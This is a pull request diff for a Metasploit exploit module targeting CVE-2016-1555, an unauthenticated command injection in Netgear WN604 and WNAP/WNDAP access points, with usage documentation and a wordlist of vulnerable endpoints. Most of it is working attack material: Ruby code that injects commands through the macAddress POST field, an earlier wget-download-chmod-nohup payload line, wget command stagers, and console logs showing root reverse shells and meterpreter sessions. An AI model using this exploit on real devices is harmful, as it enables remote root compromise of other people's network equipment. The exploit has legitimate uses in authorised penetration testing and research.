### PR TITLE
Module for CVE-2016-1555 vulnerability

### DIFF
--- a/data/wordlists/netgear_boardData_paths.txt
+++ b/data/wordlists/netgear_boardData_paths.txt
@@ -1,0 +1,5 @@
+boardData102.php
+boardData103.php
+boardDataJP.php
+boardDataNA.php
+boardDataWW.php

--- a/data/wordlists/netgear_boardData_paths.txt
+++ b/data/wordlists/netgear_boardData_paths.txt
@@ -1,5 +1,0 @@
-boardData102.php
-boardData103.php
-boardDataJP.php
-boardDataNA.php
-boardDataWW.php

--- a/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
@@ -1,4 +1,7 @@
-The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary command execution vulnerability to. Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 are vulnerable. The vulnerability occurs within how the router handles POST requests from (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. The vulnerability was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne).
+## Description
+
+
+The module leverages an unauthenticated arbitrary command execution vulnerability in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0. The vulnerability occurs within how the router handles POST requests from (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. The vulnerability was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne).
 
 ## Vulnerable Application
 
@@ -8,9 +11,11 @@ The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary com
   3. Do : `set RHOST [RouterIP]`
   4. Do : `set SRVHOST [Your server's IP]` if your payload isn't being hosted on another system
   5. Do : `set LHOST [Your IP]`
-  6. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session
-  7. Do : `exploit`
-  8. If router is vulnerable, payload should be dropped via wget (the default HTTP stager) and executed, and you should obtain a session
+  6. Do : `set MAC_ADDRESS [12 digit number]` if you want some specific MAC address instead of a random one
+  7. Do : `set TARGETURI [target URI]` if you want to target another URI instead of the default `boardDataWW.php`
+  8. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session
+  9. Do : `exploit`
+  10. If router is vulnerable, payload should be dropped via wget (the default HTTP stager) and executed, and you should obtain a session
 
 
 ## Example with default payload (linux/mipsbe/shell_reverse_tcp)
@@ -26,17 +31,17 @@ SRVHOST => 192.168.200.99
 msf exploit(linux/http/netgear_unauth_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.200.99:4444 
-[*] Using URL: http://192.168.200.99:8080/weLFnsgfRmQBR
-[*] Client 192.168.200.100 (Wget) requested /weLFnsgfRmQBR
+[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW
+[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW
 [*] Sending payload to 192.168.200.100 (Wget)
-[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:55837) at 2018-10-09 10:46:29 +0630
-[*] Command Stager progress - 118.33% done (142/120 bytes)
+[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630
+[*] Command Stager progress - 118.97% done (138/116 bytes)
 [*] Server stopped.
 
-id
-uid=0(root) gid=0(root)
 uname -a
 Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
+id
+uid=0(root) gid=0(root)
 
 ```
 
@@ -55,12 +60,12 @@ SRVHOST => 192.168.200.99
 msf exploit(linux/http/netgear_unauth_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.200.99:4444 
-[*] Using URL: http://192.168.200.99:8080/aO2fz5
-[*] Client 192.168.200.100 (Wget) requested /aO2fz5
+[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR
+[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR
 [*] Sending payload to 192.168.200.100 (Wget)
 [*] Sending stage (1108408 bytes) to 192.168.200.100
-[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:55839) at 2018-10-09 10:48:54 +0630
-[*] Command Stager progress - 119.47% done (135/113 bytes)
+[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630
+[*] Command Stager progress - 118.33% done (142/120 bytes)
 [*] Server stopped.
 
 meterpreter > sysinfo
@@ -69,8 +74,35 @@ OS           :  (Linux 2.6.32.70)
 Architecture : mips
 BuildTuple   : mips-linux-muslsf
 Meterpreter  : mipsbe/linux
-meterpreter > getuid
+meterpreter > getuid 
 Server username: uid=0, gid=0, euid=0, egid=0
 meterpreter > 
 
+```
+
+## Example using some other vulnerable URI (boardDataNA.php)
+```
+msf > use exploit/linux/http/netgear_unauth_exec 
+msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
+RHOST => 192.168.200.100
+msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php
+TARGETURI => boardDataNA.php
+msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
+LHOST => 192.168.200.99
+msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
+SRVHOST => 192.168.200.99
+msf exploit(linux/http/netgear_unauth_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.200.99:4444 
+[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As
+[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As
+[*] Sending payload to 192.168.200.100 (Wget)
+[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630
+[*] Command Stager progress - 118.64% done (140/118 bytes)
+[*] Server stopped.
+
+uname -a
+Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
+id
+uid=0(root) gid=0(root)
 ```

--- a/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
@@ -1,0 +1,84 @@
+The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary command execution vulnerability to. Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 are vulnerable. The vulnerability occurs within how the router handles POST requests from (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. The vulnerability was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne).
+
+## Vulnerable Application
+
+
+  1. Start msfconsole
+  2. Do : `use exploit/linux/http/netgear_unauth_exec`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set SRVHOST [Your server's IP]`
+  5. Do : `set LHOST [Your IP]`
+  6. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session
+  5. Do : `exploit`
+  6. If router is vulnerable, payload should be dropped via wget and executed, and you should obtain a session
+
+
+## Example with default payload (linux/mipsbe/shell_reverse_tcp)
+
+```
+msf > use exploit/linux/http/netgear_unauth_exec 
+msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
+RHOST => 192.168.0.100
+msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
+SRVHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
+LHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(linux/http/netgear_unauth_exec) > 
+[*] Started reverse TCP handler on 192.168.0.99:4444 
+[+] Got 200 OK for boardDataNA.php
+[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
+[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
+[*] Sending the payload to the server...
+[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
+[+] Deleted /tmp/IXjlVHwcHNUELM
+
+msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+uname -a
+Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
+whoami
+root
+```
+
+## Example with meterpreter (linux/mipsbe/meterpreter/reverse_tcp)
+
+```
+msf > use exploit/linux/http/netgear_unauth_exec 
+msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
+RHOST => 192.168.0.100
+msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
+SRVHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
+PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
+msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
+LHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(linux/http/netgear_unauth_exec) > 
+[*] Started reverse TCP handler on 192.168.0.99:4444 
+[+] Got 200 OK for boardDataNA.php
+[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
+[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
+[*] Sending the payload to the server...
+[*] Sending stage (1108408 bytes) to 192.168.0.100
+[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
+[+] Deleted /tmp/UcyqnUAGQ
+
+msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer     : 192.168.0.100
+OS           :  (Linux 2.6.32.70)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
@@ -6,74 +6,65 @@ The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary com
   1. Start msfconsole
   2. Do : `use exploit/linux/http/netgear_unauth_exec`
   3. Do : `set RHOST [RouterIP]`
-  4. Do : `set SRVHOST [Your server's IP]`
+  4. Do : `set SRVHOST [Your server's IP]` if your payload isn't being hosted on another system
   5. Do : `set LHOST [Your IP]`
   6. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session
   7. Do : `exploit`
-  8. If router is vulnerable, payload should be dropped via wget and executed, and you should obtain a session
+  8. If router is vulnerable, payload should be dropped via wget (the default HTTP stager) and executed, and you should obtain a session
 
 
 ## Example with default payload (linux/mipsbe/shell_reverse_tcp)
 
 ```
 msf > use exploit/linux/http/netgear_unauth_exec 
-msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
-RHOST => 192.168.0.100
-msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
-SRVHOST => 192.168.0.99
-msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
-LHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
+RHOST => 192.168.200.100
+msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
+LHOST => 192.168.200.99
+msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
+SRVHOST => 192.168.200.99
 msf exploit(linux/http/netgear_unauth_exec) > exploit
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-msf exploit(linux/http/netgear_unauth_exec) > 
-[*] Started reverse TCP handler on 192.168.0.99:4444 
-[+] Got 200 OK for boardDataNA.php
-[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
-[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
-[*] Sending the payload to the server...
-[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
-[+] Deleted /tmp/IXjlVHwcHNUELM
 
-msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
-[*] Starting interaction with 1...
+[*] Started reverse TCP handler on 192.168.200.99:4444 
+[*] Using URL: http://192.168.200.99:8080/weLFnsgfRmQBR
+[*] Client 192.168.200.100 (Wget) requested /weLFnsgfRmQBR
+[*] Sending payload to 192.168.200.100 (Wget)
+[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:55837) at 2018-10-09 10:46:29 +0630
+[*] Command Stager progress - 118.33% done (142/120 bytes)
+[*] Server stopped.
 
+id
+uid=0(root) gid=0(root)
 uname -a
 Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
-whoami
-root
+
 ```
 
 ## Example with meterpreter (linux/mipsbe/meterpreter/reverse_tcp)
 
 ```
 msf > use exploit/linux/http/netgear_unauth_exec 
-msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
-RHOST => 192.168.0.100
-msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
-SRVHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
+RHOST => 192.168.200.100
 msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
 PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
-msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
-LHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
+LHOST => 192.168.200.99
+msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
+SRVHOST => 192.168.200.99
 msf exploit(linux/http/netgear_unauth_exec) > exploit
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-msf exploit(linux/http/netgear_unauth_exec) > 
-[*] Started reverse TCP handler on 192.168.0.99:4444 
-[+] Got 200 OK for boardDataNA.php
-[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
-[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
-[*] Sending the payload to the server...
-[*] Sending stage (1108408 bytes) to 192.168.0.100
-[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
-[+] Deleted /tmp/UcyqnUAGQ
 
-msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
-[*] Starting interaction with 1...
+[*] Started reverse TCP handler on 192.168.200.99:4444 
+[*] Using URL: http://192.168.200.99:8080/aO2fz5
+[*] Client 192.168.200.100 (Wget) requested /aO2fz5
+[*] Sending payload to 192.168.200.100 (Wget)
+[*] Sending stage (1108408 bytes) to 192.168.200.100
+[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:55839) at 2018-10-09 10:48:54 +0630
+[*] Command Stager progress - 119.47% done (135/113 bytes)
+[*] Server stopped.
 
-meterpreter > sysinfo 
-Computer     : 192.168.0.100
+meterpreter > sysinfo
+Computer     : 192.168.200.100
 OS           :  (Linux 2.6.32.70)
 Architecture : mips
 BuildTuple   : mips-linux-muslsf
@@ -81,4 +72,5 @@ Meterpreter  : mipsbe/linux
 meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
 meterpreter > 
+
 ```

--- a/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
@@ -9,8 +9,8 @@ The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary com
   4. Do : `set SRVHOST [Your server's IP]`
   5. Do : `set LHOST [Your IP]`
   6. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session
-  5. Do : `exploit`
-  6. If router is vulnerable, payload should be dropped via wget and executed, and you should obtain a session
+  7. Do : `exploit`
+  8. If router is vulnerable, payload should be dropped via wget and executed, and you should obtain a session
 
 
 ## Example with default payload (linux/mipsbe/shell_reverse_tcp)

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ))
       register_options(
       [
-        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']),
+        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', 'boardDataWW.php']),
         OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', rand_text_numeric(12)])
       ])
   end
@@ -63,11 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
     'method'  => 'POST',
     'headers' => { 'Connection' => 'Keep-Alive' },
-    'uri'     => "#{targeturi}",
+    'uri'     => normalize_uri('/', "#{targeturi}"),
     'data'    => "macAddress=#{mac_addr};#{filter_bad_chars(command)};&reginfo=1&writeData=Submit\r\n"
     })
   rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
   end
 
   # check for vulnerability existence
@@ -106,3 +106,4 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 end
+

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -86,7 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
       File.read(datastore['URI_LIST']).each_line do |uri|
         response_get = request_get(uri.chomp)
         if response_get && response_get.code == 200
-#          print_good("Got 200 OK for #{uri.chomp}")
           return uri.chomp
         end
       end
@@ -96,16 +95,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # check for vulnerability existence
   def check
-    lhost = datastore['LHOST'] # implied
-    vuln_check_param = "ping -c 1 #{lhost}"
+    lhost = datastore['LHOST'] # implied, required for the "ping" check -_-
+    vuln_check_param = "ping -c 1 #{lhost}" # make this an actual check instead of a ping
     target_uri = find_uri
     if target_uri == "fail"
       fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
     else
-      print_status("Checking for existence of vulnerability in #{target_uri}...")
       response_post = request_post(target_uri,vuln_check_param)
-      if response_post && response_post.code == 200
-        print_good("Got 200 OK for #{target_uri}")
+      if response_post && response_post.code == 200 # and includes something that ensures that it's vulnerable
+        print_good("Got 200 OK for #{target_uri}") # also indicate that its vulnerable
         return Exploit::CheckCode::Vulnerable
       else
         return Exploit::CheckCode::Safe
@@ -120,7 +118,6 @@ class MetasploitModule < Msf::Exploit::Remote
     unless [CheckCode::Vulnerable].include? check
       fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
     end
-
     lhost = datastore['LHOST'].to_s
     downfile = datastore['URIPATH'] || rand_text_alpha(8+rand(8))
     resource_uri = '/' + downfile # the payload to be downloaded

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -7,9 +7,10 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+  #include Msf::Exploit::Remote::HttpServer
+  #include Msf::Exploit::EXE
+  #include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -40,130 +41,67 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_MIPSBE,
       'Payload'        => {},
       'DefaultOptions' => {
-        'PAYLOAD'  => 'linux/mipsbe/shell_reverse_tcp',
-        'WfsDelay' => 5 },
+        'CMDSTAGER::FLAVOR' => 'wget',
+        'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
+        #'VULN_URI'          => 'boardDataWW.php', 
+        'WfsDelay'          => 5 },
       'Targets'        => [[ 'Automatic',	{ }]],
+      'CmdStagerFlavor'=> %w{ echo printf wget },
       'DefaultTarget'  => 0
       ))
+  end
 
-    register_options(
-      [
-        OptPath.new('URI_LIST', [true,  "The vulnerable URIs.", '/usr/share/metasploit-framework/data/wordlists/netgear_boardData_paths.txt']),
-        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 5]),
-      ])
-    deregister_options('SSL') # because victim side does not support SSL
-    deregister_options('SSLCert') # if SSL is disabled, might as well disable this for cleaner interface
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/chmod \+x/, 'chmod 777')
+    cmd.gsub!(/;/, ' %26%26 ')
+    cmd.gsub!(/ /, '+')
   end
 
   # post request
-  def request_post(uri,command)
-    send_request_cgi({
-      'uri'    => uri,
-      'method' => 'POST',
-      'data'   => "macAddress=000000000000;#{command};&reginfo=1&writeData=Submit\r\n"
-    })
-  end
-
-  # get request
-  def request_get(uri)
-    send_request_cgi({
-      'uri'    => normalize_uri('/', uri),
-      'method' => 'GET'
-    })
-  end
-
-
-  # check for existence of vulnerable URIs
-  def find_uri
-    # read the file and loop through it to find the vulnerable URIs
-    File.read(datastore['URI_LIST']).each_line do |uri|
-      response_get = request_get(uri.chomp)
-      if response_get && response_get.code == 200
-        return uri.chomp
-      end
+  def request_post(command)
+    begin
+      send_request_cgi({
+        'method'  => 'POST',
+        'headers' => { 'Connection' => 'Keep-Alive' },
+        'uri'     => 'boardDataWW.php', # ARRRRRRGH, the worldwide one should be present everywhere
+        'query'   => Rex::Text.uri_encode(command, 'hex-all'),
+        'data'    => "macAddress=000000000000;#{filter_bad_chars(command)};&reginfo=1&writeData=Submit\r\n"
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
-
-    :fail
   end
-
 
   # check for vulnerability existence
   def check
-    lhost = datastore['LHOST'] # implied, required for the "ping" check -_-
-    vuln_check_param = "echo asdf | " # make this an actual check instead of a ping
-    target_uri = find_uri
-    if target_uri == "fail"
-      vprint_error(Failure::NotVulnerable, 'Target is not vulnerable.')
-    else
-      response_post = request_post(target_uri,vuln_check_param)
-      if response_post && response_post.code == 200 # and includes something that ensures that it's vulnerable
-        print_good("Got 200 OK for #{target_uri}") # also indicate that its vulnerable
+    vuln_check_param = "echo DEADBEEF31337" # if vulnerability is present, we will get this back in the response
+    raw_response_post = request_post(vuln_check_param) # the raw POST response
+    response_body = raw_response_post.get_html_document # the body of the POST response
+    vuln_or_not = response_body.at('input[@value="000000000000;echo DEADBEEF31337;"]').to_s # if vulnerable, everything in the input field should be in here, including DEADBEEF31337
+
+    if raw_response_post && raw_response_post.code == 200 # detected
+      if vuln_or_not.include? "DEADBEEF31337" # undeniably vulnerable
         return Exploit::CheckCode::Vulnerable
       else
-        return Exploit::CheckCode::Safe
+        return Exploit::CheckCode::Detected
       end
     end
   end
 
+  def execute_command(cmd, opts = {})
+      print_status("Sending stager...") # debug purposes
+      request_post(cmd)
+  end
 
   # the exploit method
   def exploit
-    # run a check before attempting to exploit
+    print_status("#{peer} - Connecting to target") # debug purposes
+    #run a check before attempting to exploit
     unless [CheckCode::Vulnerable].include? check
-      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
     end
-
-    lhost = datastore['LHOST'].to_s
-    downfile = datastore['URIPATH'] || rand_text_alpha(8..16)
-    resource_uri = '/' + downfile # the payload to be downloaded
-    service_url = service_url = 'http://' + lhost + ':' + datastore['SRVPORT'].to_s + resource_uri # the full path of the payload on our web server
-    vuln_uri = find_uri
-
-    # payload creation
-    @pl = generate_payload_exe
-    @elf_sent = false
-
-    print_status("Starting the web service on #{service_url} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => resource_uri
-     }})
-
-    filename = downfile
-    cmd = "wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; nohup /tmp/#{filename}"
-    register_file_for_cleanup("/tmp/#{filename}")
-    res = request_post(vuln_uri,cmd)
+    print_status("check ran its course, carrying out exploit...") # debug purposes
+    execute_cmdstager
   end
 
-
-  # Handle incoming requests from the server
-  def on_request_uri(cli, request)
-    if (not @pl)
-      print_error("A request came in, but the payload wasn't ready yet!")
-      return
-    end
-
-    print_status("Sending the payload to the server...")
-    @elf_sent = true
-    send_response(cli, @pl)
-    wait_linux_payload
-  end
-
-
-  # wait for the data to be sent
-  def wait_linux_payload
-    if @elf_sent == true
-      stop_service
-    end
-
-    while (not @elf_sent)
-      select(nil, nil, nil, 1)
-      wait_time += 1
-      if (wait_time > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "Target didn't request request the ELF payload!")
-      end
-    end
-  end
 end

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -75,12 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # check for existence of vulnerable URIs
   def find_uri
-    conn_check = request_get("/")
-
-    unless conn_check
-      return :fail
-    end
-
+    # read the file and loop through it to find the vulnerable URIs
     File.read(datastore['URI_LIST']).each_line do |uri|
       response_get = request_get(uri.chomp)
       if response_get && response_get.code == 200

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
 
-    execute_cmdstager(linemax: 128)
+    execute_cmdstager(linemax: 2048) # maximum 130,000
   end
 
 end

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -82,10 +82,10 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     send_request_cgi({
-    'method'  => 'POST',
-    'headers' => { 'Connection' => 'Keep-Alive' },
-    'uri'     => normalize_uri(target_uri.path),
-    'vars_post' => vars_post
+      'method'  => 'POST',
+      'headers' => { 'Connection' => 'Keep-Alive' },
+      'uri'     => normalize_uri(target_uri.path),
+      'vars_post' => vars_post
     })
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -43,7 +43,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' => {
         'CMDSTAGER::FLAVOR' => 'wget',
         'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
-        #'VULN_URI'          => 'boardDataWW.php', 
         'WfsDelay'          => 5 },
       'Targets'        => [[ 'Automatic',	{ }]],
       'CmdStagerFlavor'=> %w{ echo printf wget },

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -8,9 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-  #include Msf::Exploit::Remote::HttpServer
-  #include Msf::Exploit::EXE
-  #include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -75,31 +72,34 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     vuln_check_param = "echo DEADBEEF31337" # if vulnerability is present, we will get this back in the response
     raw_response_post = request_post(vuln_check_param) # the raw POST response
-    response_body = raw_response_post.get_html_document # the body of the POST response
-    vuln_or_not = response_body.at('input[@value="000000000000;echo DEADBEEF31337;"]').to_s # if vulnerable, everything in the input field should be in here, including DEADBEEF31337
-
-    if raw_response_post && raw_response_post.code == 200 # detected
-      if vuln_or_not.include? "DEADBEEF31337" # undeniably vulnerable
-        return Exploit::CheckCode::Vulnerable
+    if raw_response_post
+      if raw_response_post.code == 200
+        response_body = raw_response_post.get_html_document # the body of the POST response
+        vuln_or_not = response_body.at('input[@value="000000000000;echo DEADBEEF31337;"]').to_s # if vulnerable, DEADBEEF31337 should be here
+        if vuln_or_not.include? "DEADBEEF31337" # undeniably vulnerable
+          return Exploit::CheckCode::Vulnerable
+        else
+          return Exploit::CheckCode::Appears
+        end
       else
         return Exploit::CheckCode::Detected
       end
+    else
+      return Exploit::CheckCode::Safe
     end
   end
 
   def execute_command(cmd, opts = {})
-      print_status("Sending stager...") # debug purposes
       request_post(cmd)
   end
 
   # the exploit method
   def exploit
-    print_status("#{peer} - Connecting to target") # debug purposes
     #run a check before attempting to exploit
     unless [CheckCode::Vulnerable].include? check
-        fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+        fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
-    print_status("check ran its course, carrying out exploit...") # debug purposes
+
     execute_cmdstager
   end
 

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -1,0 +1,175 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Netgear Devices Unauthenticated Remote Command Execution',
